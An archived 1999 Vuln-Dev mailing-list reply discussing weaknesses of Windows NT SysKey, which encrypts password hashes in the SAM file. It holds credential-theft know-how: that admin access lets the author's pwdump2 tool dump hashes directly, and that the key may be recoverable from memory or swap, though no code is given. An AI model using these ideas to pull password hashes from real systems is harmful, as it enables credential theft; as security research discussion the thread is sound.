Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Vuln-Dev> 1999-q4

Exploit-Dev Archives: Re: NT SysKey should be breakable

Re: NT SysKey should be breakable

Todd Sabin (tsabinBOS.BINDVIEW.COM)
Sat, 9 Oct 1999 11:33:53 -0400

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Next message: Mikael Olsson: "Re: NT SysKey should be breakable"
Previous message: Antonomasia: "2 dodgy network programs"
Next in thread: Mikael Olsson: "Re: NT SysKey should be breakable"

Mikael Olsson <mikael.olssonENTERNET.SE> writes:

> Has anyone looked closely on the WinNT SysKey application?
>

A little.

> Supposedly, it encrypts your SAM files (the ones in
> \winnt\repair too?) so that Evil People(tm) can't
> just leech them off your machine and hand them to
> L0phtCrack.
>
> Something is telling me that this only buys you so much
> protection, since the SAM secret would need to be known
> to the OS. THAT in turn means that userland apps
> (at least ones running as LocalSystem) should be able to
> find that same secret.
>

If the machine is running and you have admin, finding the SYSKEY is
unnecessary. You can use my pwdump2 program
(http://www.webspan.net/~tas/pwdump2) to dump the unencrypted hashes,
directly.

> I _know_ this is not a one-way thing, since SysKey actually
> asks you where to store the secret (password protected,
> on a floppy, or just plain).
>
> - Plain stored secret should be "easy" to find.
>
> - If someone enables password protection, it should still
> be possible to break the secret of the SAM secret using
> known plaintext attacks. We know that the original SAM._
> file begins with "MSCF" followed by four zero bytes.
> That's eight bytes of known plaintext.
> There's also a string "$$hive$$.tmp" later on that seems
> to be constant, which we should be able to use as known
> plaintext. (These are just the obvious ones)
>

SYSKEY doesn't encrypt the entire contents of the SAM file, only the
'sensitive' parts: the password hashes and password histories, I
think. More recent service packs have extended it to also encrypt the
LSA secrets and cached logon passwords, I believe.

> I'm going to go ahead and guess that the secret
> used to encrypt the SAM secret is an LMHASH of
> the given password.
>
> It could also be that the SAM secret is kept
> somewhere in RAM without the password scramble.
>

I think this is the case, but am not sure. I know it's originally
obtained by winlogon during the boot process, and then handed off to
lsass which uses it to do the on the fly decryption. Also, I didn't
see anything that would prevent the SYSKEY from ending up in the swap
file, so it may be possible to grab it from there.

> - Floppy secrets could also be breakable; again, maybe
> they are loaded into RAM, or maybe the Admin just
> happened to leave the floppy in the drive :-P
>
>
> Maybe worth looking into?

I think the things most worth looking at are what can you do if you
e.g., steal a machine or backup tape, but don't get the SYSKEY. These
are the types of attacks it's meant to protect against.

Todd

Next message: Mikael Olsson: "Re: NT SysKey should be breakable"
Previous message: Antonomasia: "2 dodgy network programs"
Next in thread: Mikael Olsson: "Re: NT SysKey should be breakable"

This archive was generated by hypermail 2.0b3 on Sat Oct 09 1999 - 11:05:45 CDT